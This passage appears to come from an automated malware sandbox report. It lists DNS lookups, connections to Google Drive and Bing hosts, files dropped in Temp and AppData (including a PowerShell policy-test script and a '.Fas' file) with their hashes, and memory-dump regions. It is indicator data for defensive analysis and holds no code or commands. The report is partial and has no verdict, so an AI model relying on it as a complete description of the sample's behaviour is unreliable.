| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| NL | 23.62.61.99:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 169.249.36.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.253.116.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Rundturens.txt
| MD5 | 7e6d89dc0c35f26ded7b53e429b04ec3 |
| SHA1 | f2fb6c6a84df0cf48ee76d60664111d1baa24cd0 |
| SHA256 | 4cb39102cda5cbf90e02b17a04c28f82cde573ab5593d0f0effc4002cbe32ad2 |
| SHA512 | 9bf8f6da9713281cf36b5c1a9316c62b62d53306c119be65c48fa3e794d065f98f296fd87cf84df3e66edfa5604159ce62bc5084189ea164f88e5eb2def9c830 |
C:\Users\Admin\AppData\Local\Temp\Rundturens.txt
| MD5 | 443b324d675759a9733092884bdbbb72 |
| SHA1 | be4da5df341cf4420f29539689b94fca9053e005 |
| SHA256 | 291eced9e11995a5ac4edb6b1ff3978083b6400ce7be3b3b3bba3259698f5b2a |
| SHA512 | d562e0b41c7c44528b41d30a3cd7bca2f0dd55391ac63d84295fdd371e37e2f59cd09248a4f950afd1f5ada7828e346fd619aa37b642f8fcb0c968cc07daf64b |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g22mh1us.am3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3204-313-0x00000263CBBF0000-0x00000263CBC12000-memory.dmp
memory/3204-323-0x00007FF803360000-0x00007FF803E21000-memory.dmp
memory/3204-324-0x00000263CBA20000-0x00000263CBA30000-memory.dmp
memory/3204-325-0x00000263CBA20000-0x00000263CBA30000-memory.dmp
memory/4876-329-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/4876-328-0x00000000026D0000-0x0000000002706000-memory.dmp
memory/4876-330-0x0000000004E00000-0x0000000004E10000-memory.dmp
memory/4876-331-0x0000000005440000-0x0000000005A68000-memory.dmp
memory/4876-332-0x00000000051E0000-0x0000000005202000-memory.dmp
memory/4876-333-0x0000000005380000-0x00000000053E6000-memory.dmp
memory/4876-334-0x0000000005AE0000-0x0000000005B46000-memory.dmp
memory/4876-344-0x0000000005B50000-0x0000000005EA4000-memory.dmp
memory/4876-345-0x0000000006090000-0x00000000060AE000-memory.dmp
memory/4876-346-0x0000000006130000-0x000000000617C000-memory.dmp
memory/4876-347-0x00000000078C0000-0x0000000007F3A000-memory.dmp
memory/4876-348-0x00000000071D0000-0x00000000071EA000-memory.dmp
memory/4876-349-0x0000000007340000-0x00000000073D6000-memory.dmp
memory/4876-350-0x00000000072D0000-0x00000000072F2000-memory.dmp
memory/4876-351-0x00000000084F0000-0x0000000008A94000-memory.dmp
C:\Users\Admin\AppData\Roaming\gennemsgnings.Fas
| MD5 | eef3f42f8568ec1d96e3fc1a3174c27f |
| SHA1 | b58f1fae7aeb4f69389a46d62fb110c5bf0b39a2 |
| SHA256 | f87d719b62b1b6a582ae647b47dcb70855495c65307cc786ebaf1580a7f1628e |
| SHA512 | f386755db46e2454711107f92c6ebc47dbfb50d047ddc296304703223928f5a1e8a6156e05e1544e2fd9b07cf63a5fdf54a16ce3010f650670c828f8ee4d37dc |
memory/3204-353-0x00007FF803360000-0x00007FF803E21000-memory.dmp
memory/4876-354-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/3204-357-0x00007FF803360000-0x00007FF803E21000-memory.dmp